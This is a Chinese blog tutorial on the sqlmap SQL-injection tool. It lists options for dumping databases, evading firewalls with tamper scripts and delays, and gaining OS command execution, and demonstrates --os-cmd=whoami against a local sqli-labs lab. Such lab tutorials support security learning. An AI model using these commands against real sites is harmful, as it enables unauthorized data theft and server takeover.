首页 > 数据库 >SQLMAP使用

SQLMAP使用

时间:2023-02-04 21:15:20浏览次数:43  
标签:SQLMAP sqlmap 请求 level -- 测试 使用

sqlmap使用教程

-u 指定目标URL (可以是http协议也可以是https协议)

-d 连接数据库

--dbs 列出所有的数据库

--current-db 列出当前数据库

--tables 列出当前的表

--columns 列出当前的列

-D 选择使用哪个数据库

-T 选择使用哪个表

-C 选择使用哪个列

--dump 获取字段中的数据

--batch 自动选择yes

--smart 启发式快速判断,节约浪费时间

--forms 尝试使用post注入

-r 加载文件中的HTTP请求(本地保存的请求包txt文件)

-l 加载文件中的HTTP请求(本地保存的请求包日志文件)

-g 自动获取Google搜索的前一百个结果,对有GET参数的URL测试

-o 开启所有默认性能优化

--tamper 调用脚本进行注入

-v 指定sqlmap的回显等级

--delay 设置多久访问一次

--os-shell 获取主机shell,一般不太好用,因为没权限

-m 批量操作

-c 指定配置文件,会按照该配置文件执行动作

-data data指定的数据会当做post数据提交

-timeout 设定超时时间

-level 设置注入探测等级

--risk 风险等级

--identify-waf 检测防火墙类型

--param-del="分割符" 设置参数的分割符

--skip-urlencode 不进行url编码

--keep-alive 设置持久连接,加快探测速度

--null-connection 检索没有body响应的内容,多用于盲注

--thread 最大为10 设置多线程

--delay

有些web服务器请求访问太过频繁可能会被防火墙拦截,使用--delay就可以设定两次http请求的延时

img

--safe-url

有的web服务器会在多次错误的访问请求后屏蔽所有请求,使用--safe-url 就可以每隔一段时间去访问一个正常的页面。

--tamper

语法:--tamper ["脚本名称"]

当调用多个脚本的时候,脚本之间用逗号隔开,调用的脚本在 sqlmap文件夹下的 tamper 文件夹中

img

脚本信息

img

-v ["x"]

使用sqlmap注入测试时,可以使用 -v [x] 参数来指定回显信息的复杂程度, x 的取值范围为[0~6]:

img

--level

level有5个等级,默认等级为1,进行Cookie测试时使用--level 2 ,进行use-agent或refer测试时使用--level 3 ,进行 host 测试时使用--level 5

–-os-cmd=["命令"] 或 --os-shell=["命令"] 执行系统命令

利用sql-labs-less1测试 whoami 命令

sqlmap -u "http://192.168.0.6/sqli-labs-master/Less-1/?id=1" --os-cmd=whoami

选择web服务器支持的语言

img

选择web服务器的可写目录

[1] 使用默认的

[2] 自定义位置

[3] 自定义目录列表文件

[4] 暴力搜索

img

我在本地测试,节省时间,我选择2 ,自定义路径,然后把路径输入在下面

img

执行命令后的返回结果

img

以下关卡均可用get型的方法,常规注入

img

标签:SQLMAP,sqlmap,请求,level,--,测试,使用
From: https://www.cnblogs.com/crabin/p/17092369.html

相关文章

  • SQL注入-SQLmap-不同数据库注入
    SQL注入-不同数据库注入-注入工具的使用简要学习各种数据库的注入特点access,mysql,mssql,mongoDB,postgresql,sqlite,oracle,sybase等1.access注入Access数据库......
  • splash的使用
    splash是一个JavaScript渲染服务,利用它可以爬取动态渲染的页面一、简介功能异步处理多个网页的渲染过程可以获取渲染后页面的源代码、截图、以及页面的加载过程信息......
  • ChatGPT 有哪些神奇的使用方式?使用chargpt写代码 搜索问题 写论文
    本教程介绍chargpt使用教程:不需要梯子,不需要注册,也不需要缴纳费用通过本教程您将会使用chargpt写代码搜索问题写论文。我展示了两个问题问题一:用python写一个学生信......
  • MyBatis的使用七(处理表与表之间的关系)
    本文主要讲述mybatis的处理表与表之间的关系一.介绍t_emp和t_dept表1.t_emp表结构2.t_dept表结构二.数据表的关系1.阐明关系一个部门可以有......
  • SQL注入-SQLmap-不同数据库注入
    SQL注入-不同数据库注入-注入工具的使用简要学习各种数据库的注入特点access,mysql,mssql,mongoDB,postgresql,sqlite,oracle,sybase等1.access注入Access数据库......
  • SQLMAP使用
    sqlmap使用教程-u指定目标URL(可以是http协议也可以是https协议)-d连接数据库--dbs列出所有的数据库--current-db列出当前数据库--tables列出当前的表--column......
  • docker使用
    docker使用1.安装docker安装docker源https://developer.aliyun.com/mirror/---------------------------安装步骤centos7------------------------------#step......
  • Android 使用腾讯地图定位地点
    Android利用和风天气API显示实时天气-拾一贰叁-博客园(cnblogs.com)之前使用和风天气的SDK在AndroidApp上显示了实时天气情况,但是显示的地点信息是提前设置好的因......
  • 阿里云盘致歉:因系统故障出现短暂无法正常使用情况,已修复
    2月4日凌晨,@阿里云盘发文致歉称,由于系统故障,阿里云盘2月3日晚间出现了短暂的无法正常使用的情况,23:50分已修复,不影响用户的数据和后续使用。 ......
  • 【C语言】为什么使用文件、什么是文件、文件名、文件指针。
    ......